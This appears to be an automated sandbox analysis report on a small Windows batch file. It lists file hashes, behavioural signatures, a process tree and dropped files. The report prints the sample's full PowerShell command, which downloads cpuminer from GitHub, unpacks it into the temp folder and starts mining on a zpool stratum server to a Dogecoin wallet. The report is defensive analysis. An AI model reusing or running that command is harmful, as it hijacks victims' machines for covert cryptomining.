Analysis
-
max time kernel
1796s -
max time network
1803s -
platform
windows10-1703_x64 -
resource
win10-20231215-ja -
resource tags
arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
04/02/2024, 15:51
Static task
static1
Behavioral task
behavioral1
Sample
73u3Ito.bat
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
73u3Ito.bat
Resource
win10v2004-20231215-ja
General
-
Target
73u3Ito.bat
-
Size
499B
-
MD5
fe74bff27516829a88cfbc6f6e99646f
-
SHA1
0c15d859211c79910b277d07e729bec7197a60cd
-
SHA256
b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
-
SHA512
a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 2 4952 powershell.exe 4 4952 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3928 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 3928 cpuminer-sse2.exe 3928 cpuminer-sse2.exe 3928 cpuminer-sse2.exe 3928 cpuminer-sse2.exe 3928 cpuminer-sse2.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 4952 powershell.exe 4952 powershell.exe 4952 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4952 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 780 wrote to memory of 4952 780 cmd.exe 74 PID 780 wrote to memory of 4952 780 cmd.exe 74 PID 4952 wrote to memory of 200 4952 powershell.exe 75 PID 4952 wrote to memory of 200 4952 powershell.exe 75 PID 200 wrote to memory of 3928 200 cmd.exe 77 PID 200 wrote to memory of 3928 200 cmd.exe 77
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 23⤵
- Suspicious use of WriteProcessMemory
PID:200 -
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 24⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3928
-
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
542KB
MD5d681aff04bb8e580c55c3fa5aa8fb29d
SHA191bdcff9135cf686aed784b8d696cab82fdac2dc
SHA2565653b628d2a3286d177d12e7391f7e8bff9c2913accfe576621b5844911aa0a2
SHA512da44c0be112ba6ceef1bdb1ef1e0266ed049114337e1d03c79ee65d145b3e6a81a226605f8d9ab1b618960e6d30d395c85b60dfef22f7cd6924d1ab524966e6d
-
Filesize
865KB
MD5dd69f2541479d483b72f522ccca92c4d
SHA19a596e6c90fa7bbd5816f7dd72e4a0d96ec69ef4
SHA256ee1b05686b3b262c44b4e2a1676d460ad330a60433b4de78f9d96ed8862b5cb1
SHA512bd6ed47eada53a1a7a22cf5ee60232a051c7282e60e2ae3cf2a7592b44f5a9b96b4fbce9fefaaa2a3902ee4928385d4841eb0f0ca39af6bd6c0861cec99f02a8
-
Filesize
714KB
MD511dbcda5a4270a376634f5778930207e
SHA14ab140d87822173946a0ac093c52f5074cebcbb4
SHA25632904ac33cd3671838a9fc8aebe8943e38099540a67bd63c85a5f1aeb848b5da
SHA512ea83e0c8398e68a2c8e385b6bb6a93845c982bc4a7351451a7dc2261e41be25572da5f01cb829fd3edacf1445dcf98587a8e32c764367c4db1129dbaaf9a4af5
-
Filesize
497KB
MD5f62a1026304b3d059b197850eda690e5
SHA11013759b16ecd2e32ed1940f3fe4d8792bb781a8
SHA2567be5a78d46e2dae5b94cef2dc20c06f8496f835ad27eb85a092bafb9fcd43936
SHA512e014e8805f386084cbf99aa08337e5d4b419e2c8d31493f77f34fd8a1d5c60ff0e42421d3cc8dc85b183a6768751d4c35be2cdc28ebaa7a41b4e0b12ea2d0a56
-
Filesize
464KB
MD5ac0186919a888c28852f02df1a601aa6
SHA15f6b5a3ce1a8749687602d4d3d7965e1c05f992a
SHA256cf4c9dbe83b1ddc48edef1c8cea0d0d1987aae95716ea5034e8019681eaf8b55
SHA51252dcd31ec990034b30ee7323f1070f5b029577ddadf15de8a58e89b512212d4d4a59d57d9343653c7254e19fbc7c0f0168b8c17590688f23407eba19b53f0c0c
-
Filesize
550KB
MD5365a665feb5b25a7e562b3195970570d
SHA1bcb21c6d1cfc51e9582fae451228a893aebfdbed
SHA256d346173637a57eaf34da749471cfd91ab21a2f092b4ac46836ece2e7467fdc10
SHA512a2b63bd19c347f4012867b9ad254eeb32bc412d5745a5ebc0fefc9c38e1e4d00a113a096d74272c05659f128cd28e285b3bc429d9c138e0dd5a57aa1b9ea4667
-
Filesize
748KB
MD58e1a5dfa674a8dbb5ff58a0ce25df48e
SHA14b255b70f8c22fe185f5ce7b09c57460433df34d
SHA25687174f351519beefbd5a3e186bd12ceda5a498c349114c65959a8e82988f8547
SHA512232b9e71962e52505685cd6eb1b51f1e109e36f0d3476ec903c3d67cb678ebffcf91f5b03e14272b82cd08655a0694254fac70730e3d3605654919342e1ebb95
-
Filesize
787KB
MD5f1b6375a0f5c38caf9c4931608a8a55c
SHA14e336ff2cb17ee4fa5d376eda22cfe35db733d15
SHA256d543e6aff7b736f50c6f5a725dd91bf4aa904f78b2db908669e07fe6672b0345
SHA512e0ab166379da40438b6b0e31f5739a8d43e57090b0074b31a01350556479a6105f41447e144c2aabe0a2512743fa70fa021e9dbf0e6bc52499ec6eddc68fa5c3
-
Filesize
399KB
MD52c65135cc80d6295a513c187b42cc2aa
SHA1391f38cbfcabae0ae6ad84c793d76d658ad10104
SHA2568b5d773fa8e09ea7375301f345c00e069f44816556951bfecbb846021adec2b5
SHA5127ac1d51a14b67bf79a0bfb9e4a51949eb945dd17d3be774ad1621396c40233931151e1558029bc36892e4e83a3ea0dcf43b39ff56f52af0d447ee0896019d1f3
-
Filesize
357KB
MD566b3cbb9d4740828a7a05454ea910a27
SHA19ae15856269f26cb78079caba6614f9c946ba37e
SHA256e39a0fc35184bcec57ad96356d630dcfea0537bcbea02933f85d5594e18cabbd
SHA5123388758da4e44cd2f75037ed4bc9319d4c08fd62c17245af13dff280ff887510bdc555f11a2862e0e0ed34d1dfaac7683743ce36a68d65e2ee22c5eb210389b4
-
Filesize
525KB
MD5e314437666fd7a055241ac89db1cad6d
SHA13550e784c630f1b9d3c61a6d3fe5efa6bbcf40b4
SHA256254018e0d01fb5ddc6b72a6add936ca7b5d1c2db41d81945dc923fc5e3f85ca4
SHA512cd2b40841a622cf7d9bc4808bc7988cd060ac1d68a7d1827e2d11f71359b58092d0aae7101b67d1e2ad8b80a4f40894d7772110a61542054411963b31d0efce3